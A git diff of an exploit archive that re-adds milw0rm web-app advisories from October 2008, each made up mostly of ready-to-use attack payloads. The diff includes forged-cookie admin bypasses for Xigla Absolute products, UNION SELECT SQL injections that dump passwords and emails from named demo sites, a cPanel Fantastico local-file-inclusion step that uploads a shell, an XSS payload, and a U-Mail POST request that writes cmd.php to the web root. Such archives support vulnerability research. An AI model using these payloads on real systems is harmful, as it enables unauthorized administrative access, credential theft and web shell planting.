+[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm
+[~] Team : EgY Coders 
+#################################################################################################
+
+Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx
+Second Execute 
+[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s=";
+Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx
+
+
+--- Proud To Be A Muslim ---
+
+# _=END=_ # 
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6890.txt b/platforms/php/webapps/6890.txt
index 91838ccd8..692472c1b 100755
--- a/platforms/php/webapps/6890.txt
+++ b/platforms/php/webapps/6890.txt
@@ -1,24 +1,24 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-[~] Author : Hakxer
-[~] Home : Www.educ-up.com
-[~] Type Gap : Insecure Cookie Handling
-[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm
-[~] Team : EgY Coders 
-#################################################################################################
-
-Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx
-Second Execute JS Code 
-[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator";
-Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx
-
---- Proud To Be A Muslim ---
-
-# _=END=_ # 
-
-# milw0rm.com [2008-10-31]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+[~] Author : Hakxer
+[~] Home : Www.educ-up.com
+[~] Type Gap : Insecure Cookie Handling
+[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm
+[~] Team : EgY Coders 
+#################################################################################################
+
+Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx
+Second Execute JS Code 
+[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator";
+Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx
+
+--- Proud To Be A Muslim ---
+
+# _=END=_ # 
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6891.txt b/platforms/php/webapps/6891.txt
index 6ef293869..d172e29f8 100755
--- a/platforms/php/webapps/6891.txt
+++ b/platforms/php/webapps/6891.txt
@@ -1,24 +1,24 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-[~] Author : Hakxer
-[~] Home : Www.educ-up.com
-[~] Type Gap : Insecure Cookie Handling
-[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm
-[~] Team : EgY Coders 
-#################################################################################################
-
-Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx
-Second Execute JS Code 
-[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked";
-Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx
-
---- Proud To Be A Muslim ---
-
-# _=END=_ # 
-
-# milw0rm.com [2008-10-31]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+[~] Author : Hakxer
+[~] Home : Www.educ-up.com
+[~] Type Gap : Insecure Cookie Handling
+[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm
+[~] Team : EgY Coders 
+#################################################################################################
+
+Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx
+Second Execute JS Code 
+[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked";
+Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx
+
+--- Proud To Be A Muslim ---
+
+# _=END=_ # 
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6892.txt b/platforms/php/webapps/6892.txt
index fc2bdf4bd..c34b0587c 100755
--- a/platforms/php/webapps/6892.txt
+++ b/platforms/php/webapps/6892.txt
@@ -1,25 +1,25 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-[~] Discovered By: Hakxer
-[~] Home : Www.educ-up.com
-[~] Type Gap : Insecure Cookie Handling
-[~] script : Absolute Live Support  [see script] http://www.xigla.com/absolutelsnet/demo.htm
-[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
-[~] Team : EgY Coders 
-#################################################################################################
-
-Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx
-Second Execute JS Code 
-[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you";
-Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx
-
---- Proud To Be A Muslim ---
-
-# _=END=_ # 
-
-# milw0rm.com [2008-10-31]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+[~] Discovered By: Hakxer
+[~] Home : Www.educ-up.com
+[~] Type Gap : Insecure Cookie Handling
+[~] script : Absolute Live Support  [see script] http://www.xigla.com/absolutelsnet/demo.htm
+[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
+[~] Team : EgY Coders 
+#################################################################################################
+
+Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx
+Second Execute JS Code 
+[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you";
+Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx
+
+--- Proud To Be A Muslim ---
+
+# _=END=_ # 
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6893.txt b/platforms/php/webapps/6893.txt
index 48418ac3b..b5c1d19c9 100755
--- a/platforms/php/webapps/6893.txt
+++ b/platforms/php/webapps/6893.txt
@@ -1,25 +1,25 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-[~] Discovered By : Hakxer
-[~] Home : Www.educ-up.com
-[~] Type Gap : Insecure Cookie Handling
-[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm
-[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
-[~] Team : EgY Coders 
-#################################################################################################
-
-Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp
-Second Execute JS Code 
-[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1";
-Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp
-
---- Proud To Be A Muslim ---
-
-# _=END=_ # 
-
-# milw0rm.com [2008-10-31]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+[~] Discovered By : Hakxer
+[~] Home : Www.educ-up.com
+[~] Type Gap : Insecure Cookie Handling
+[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm
+[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
+[~] Team : EgY Coders 
+#################################################################################################
+
+Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp
+Second Execute JS Code 
+[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1";
+Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp
+
+--- Proud To Be A Muslim ---
+
+# _=END=_ # 
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6894.txt b/platforms/php/webapps/6894.txt
index 5243215aa..e2e0bc9aa 100755
--- a/platforms/php/webapps/6894.txt
+++ b/platforms/php/webapps/6894.txt
@@ -1,24 +1,23 @@
-
-==================================================================================
-   SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
-==================================================================================
-			   __  __           __          
-			   / / / /_  _______/ /__  __  __
-			  / /_/ / / / / ___/ / _ \/ / / /
-			 / __  / /_/ / /  / /  __/ /_/ / 
-			/_/ /_/\__,_/_/  /_/\___/\__, /  
-			                        /____/   
-==================================================================================
-----------------------------------------------------------------------------------
-Website script: http://www.scripts-for-sites.info/index.php
-----------------------------------------------------------------------------------
-Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
-----------------------------------------------------------------------------------
-LiveDemo:
-http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
-----------------------------------------------------------------------------------
-==================================================================================
-Special Thx : Darckc0de
-==================================================================================
-
-# milw0rm.com [2008-10-31]
+==================================================================================
+   SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
+==================================================================================
+			   __  __           __          
+			   / / / /_  _______/ /__  __  __
+			  / /_/ / / / / ___/ / _ \/ / / /
+			 / __  / /_/ / /  / /  __/ /_/ / 
+			/_/ /_/\__,_/_/  /_/\___/\__, /  
+			                        /____/   
+==================================================================================
+----------------------------------------------------------------------------------
+Website script: http://www.scripts-for-sites.info/index.php
+----------------------------------------------------------------------------------
+Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
+----------------------------------------------------------------------------------
+LiveDemo:
+http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
+----------------------------------------------------------------------------------
+==================================================================================
+Special Thx : Darckc0de
+==================================================================================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6895.txt b/platforms/php/webapps/6895.txt
index b30cf2bef..3bebfbaa6 100755
--- a/platforms/php/webapps/6895.txt
+++ b/platforms/php/webapps/6895.txt
@@ -1,24 +1,23 @@
-
-==================================================================================
-   SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability
-==================================================================================
-			   __  __           __          
-			   / / / /_  _______/ /__  __  __
-			  / /_/ / / / / ___/ / _ \/ / / /
-			 / __  / /_/ / /  / /  __/ /_/ / 
-			/_/ /_/\__,_/_/  /_/\___/\__, /  
-			                        /____/   
-==================================================================================
-----------------------------------------------------------------------------------
-Website script: http://www.scripts-for-sites.info/index.php
-----------------------------------------------------------------------------------
-Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
-----------------------------------------------------------------------------------
-LiveDemo:
-http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
-----------------------------------------------------------------------------------
-==================================================================================
-Special Thx : Darckc0de
-==================================================================================
-
-# milw0rm.com [2008-10-31]
+==================================================================================
+   SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability
+==================================================================================
+			   __  __           __          
+			   / / / /_  _______/ /__  __  __
+			  / /_/ / / / / ___/ / _ \/ / / /
+			 / __  / /_/ / /  / /  __/ /_/ / 
+			/_/ /_/\__,_/_/  /_/\___/\__, /  
+			                        /____/   
+==================================================================================
+----------------------------------------------------------------------------------
+Website script: http://www.scripts-for-sites.info/index.php
+----------------------------------------------------------------------------------
+Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
+----------------------------------------------------------------------------------
+LiveDemo:
+http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
+----------------------------------------------------------------------------------
+==================================================================================
+Special Thx : Darckc0de
+==================================================================================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6896.txt b/platforms/php/webapps/6896.txt
index 91bda3e79..c6a18d393 100755
--- a/platforms/php/webapps/6896.txt
+++ b/platforms/php/webapps/6896.txt
@@ -1,55 +1,55 @@
-[~] Logz podcast CMS version 1.3.1 Remote sql inj
-[~]
-[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 31.10.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] -----------------------------------------------------------
-
-file:
-
-fichiers/add_url.php
-
-code:
-
-       if (isset($_GET['art'])) {
-	      $Article = $_GET['art']; 
-	      
-	      ...
-	      
-	      $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
-        $ResultRequete = requete_mysql($Requete);
-	      
-	   
-
-Exploit:
-
-http://localhost/script_path/fichiers/add_url.php?art=[SQL]
-
-[SQL]= column number 1 (SELECT TITRE FROM ...)
-
-1'+union+select+concat(user(),0x3a,database())/*
-
-example:
-
-http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-10-31]
+[~] Logz podcast CMS version 1.3.1 Remote sql inj
+[~]
+[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 31.10.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] -----------------------------------------------------------
+
+file:
+
+fichiers/add_url.php
+
+code:
+
+       if (isset($_GET['art'])) {
+	      $Article = $_GET['art']; 
+	      
+	      ...
+	      
+	      $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
+        $ResultRequete = requete_mysql($Requete);
+	      
+	   
+
+Exploit:
+
+http://localhost/script_path/fichiers/add_url.php?art=[SQL]
+
+[SQL]= column number 1 (SELECT TITRE FROM ...)
+
+1'+union+select+concat(user(),0x3a,database())/*
+
+example:
+
+http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6897.txt b/platforms/php/webapps/6897.txt
index 4f61a3b97..40681361e 100755
--- a/platforms/php/webapps/6897.txt
+++ b/platforms/php/webapps/6897.txt
@@ -1,66 +1,66 @@
-----------------------------------------------------------------
-
-Script : Cpanel 11.x
-
-Type : Local File Inclusion & Cross Site Scripting
-
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : Khashayar Fereidani
-
-**** I am 17 Years Old ****
-
-My Official Website : HTTP://FEREIDANI.IR
-
-Team Website : Http://IRCRASH.COM
-
-Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
-
-Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
-
-----------------------------------------------------------------
-
-Local File Inclusion Vulnerability :
-
-Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
-       enter vulnerable address in url ....
-
-
-https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
-
-https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
-
-https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
-
-----------------------------------------------------------------
-
-Cross site scripting :
-
-File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4
-
-Set Action as Upgrade%20to%201.7.4
-
-Vulnerable Variables :
-
-$localapp
-$updatedir
-$scriptpath_show
-$domain_show
-$thispage
-$thisapp
-$currentversion
-
-For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
-
-
-----------------------------------------------------------------
-
-                        Tnx : God
-
-          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
-
-----------------------------------------------------------------
-
-# milw0rm.com [2008-10-31]
+----------------------------------------------------------------
+
+Script : Cpanel 11.x
+
+Type : Local File Inclusion & Cross Site Scripting
+
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : Khashayar Fereidani
+
+**** I am 17 Years Old ****
+
+My Official Website : HTTP://FEREIDANI.IR
+
+Team Website : Http://IRCRASH.COM
+
+Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
+
+Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
+
+----------------------------------------------------------------
+
+Local File Inclusion Vulnerability :
+
+Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
+       enter vulnerable address in url ....
+
+
+https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
+
+https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
+
+https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
+
+----------------------------------------------------------------
+
+Cross site scripting :
+
+File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4
+
+Set Action as Upgrade%20to%201.7.4
+
+Vulnerable Variables :
+
+$localapp
+$updatedir
+$scriptpath_show
+$domain_show
+$thispage
+$thisapp
+$currentversion
+
+For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
+
+
+----------------------------------------------------------------
+
+                        Tnx : God
+
+          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
+
+----------------------------------------------------------------
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6898.txt b/platforms/php/webapps/6898.txt
index 37a116deb..08e0cc688 100755
--- a/platforms/php/webapps/6898.txt
+++ b/platforms/php/webapps/6898.txt
@@ -1,36 +1,36 @@
-U-Mail Webmail Arbitrary File Write Vulnerability
-
-==================================================
-
-Vulnerable: 	U-Mail 4.91 
-Vendors:	www.comingchina.com	
-Category:   	Input Validation Error
-Impact:		An attacker can write arbitrary data to new files.
-Author:		Shennan Wang
-Date:		2008-10-30
-Web:		http://hi.baidu.com/nansec
-
-
-Details:
-=========	
-This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of U-Mail Webmail Server. Authentication is required to exploit this vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail Webmail Server. A malicious HTTP POST request can write arbitrary file to the publicly accessible web directories.
-
-
-Exploit:
-=========
-POST /webmail/modules/filesystem/edit.php HTTP/1.1
-Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
-Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
-Accept-Language: zh-cn
-Content-Type: application/x-www-form-urlencoded
-Accept-Encoding: gzip, deflate
-User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
-Host: mail.d4rkn3t.cn
-Content-Length: 120
-Connection: Keep-Alive
-Cache-Control: no-cache
-Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18
-
-path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=
-
-# milw0rm.com [2008-10-31]
+U-Mail Webmail Arbitrary File Write Vulnerability
+
+==================================================
+
+Vulnerable: 	U-Mail 4.91 
+Vendors:	www.comingchina.com	
+Category:   	Input Validation Error
+Impact:		An attacker can write arbitrary data to new files.
+Author:		Shennan Wang
+Date:		2008-10-30
+Web:		http://hi.baidu.com/nansec
+
+
+Details:
+=========	
+This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of U-Mail Webmail Server. Authentication is required to exploit this vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail Webmail Server. A malicious HTTP POST request can write arbitrary file to the publicly accessible web directories.
+
+
+Exploit:
+=========
+POST /webmail/modules/filesystem/edit.php HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
+Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
+Accept-Language: zh-cn
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
+Host: mail.d4rkn3t.cn
+Content-Length: 120
+Connection: Keep-Alive
+Cache-Control: no-cache
+Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18
+
+path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6900.txt b/platforms/php/webapps/6900.txt
index 59f6048ff..9f35cf30d 100755
--- a/platforms/php/webapps/6900.txt
+++ b/platforms/php/webapps/6900.txt
@@ -1,13 +1,13 @@
-#################################################################################
-## Discovered by : Hakxer                                                       #
-## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
-## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
-## Team : EgY Coders Team                                                       #
-## ----------------------------Start Exploit----------------------------------- #
-## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
-## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
-## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
-## _=END=_
-#############################################################################
-
-# milw0rm.com [2008-10-31]
+#################################################################################
+## Discovered by : Hakxer                                                       #
+## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
+## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
+## Team : EgY Coders Team                                                       #
+## ----------------------------Start Exploit----------------------------------- #
+## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
+## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
+## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
+## _=END=_
+#############################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6901.txt b/platforms/php/webapps/6901.txt
index fef209497..48eb3d466 100755
--- a/platforms/php/webapps/6901.txt
+++ b/platforms/php/webapps/6901.txt
@@ -1,18 +1,18 @@
-########################################################################
-# Discovered by : Hakxer                                               #
-# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
-# Greetz : Allah , All My friend ,www.educ-up.com                      #
-# -------------------------------                                      #
-# Poc :                                                                #
-# javascript:document.cookie="xlaAFSuser=p=admin";                     #
-#                                                                      #
-# [~] Exploit                                                          #
-#                                                                      #
-# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
-# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
-# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
-# 								       #
-# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
-########################################################################
-
-# milw0rm.com [2008-10-31]
+########################################################################
+# Discovered by : Hakxer                                               #
+# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
+# Greetz : Allah , All My friend ,www.educ-up.com                      #
+# -------------------------------                                      #
+# Poc :                                                                #
+# javascript:document.cookie="xlaAFSuser=p=admin";                     #
+#                                                                      #
+# [~] Exploit                                                          #
+#                                                                      #
+# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
+# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
+# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
+# 								       #
+# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
+########################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6902.txt b/platforms/php/webapps/6902.txt
index cfb6638e6..562459d7a 100755
--- a/platforms/php/webapps/6902.txt
+++ b/platforms/php/webapps/6902.txt
@@ -1,18 +1,18 @@
-#####################################################################################
-# Discovered by : Hakxer                                                            #
-# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm         #
-# Greetz : Allah , All My friend ,www.educ-up.com                                   #
-# -------------------------------                                                   #
-# Poc :                                                                             #
-# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s=";                   #
-#                                                                                   #
-# [~] Exploit                                                                       #
-#                                                                                   #
-# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx            #
-# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
-# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx                      #
-# 								                    #
-# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )                    #
-#####################################################################################
-
-# milw0rm.com [2008-10-31]
+#####################################################################################
+# Discovered by : Hakxer                                                            #
+# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm         #
+# Greetz : Allah , All My friend ,www.educ-up.com                                   #
+# -------------------------------                                                   #
+# Poc :                                                                             #
+# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s=";                   #
+#                                                                                   #
+# [~] Exploit                                                                       #
+#                                                                                   #
+# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx            #
+# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
+# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx                      #
+# 								                    #
+# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )                    #
+#####################################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6903.txt b/platforms/php/webapps/6903.txt
index a773e0a45..f875c9f72 100755
--- a/platforms/php/webapps/6903.txt
+++ b/platforms/php/webapps/6903.txt
@@ -1,16 +1,16 @@
-Author : TR-ShaRk
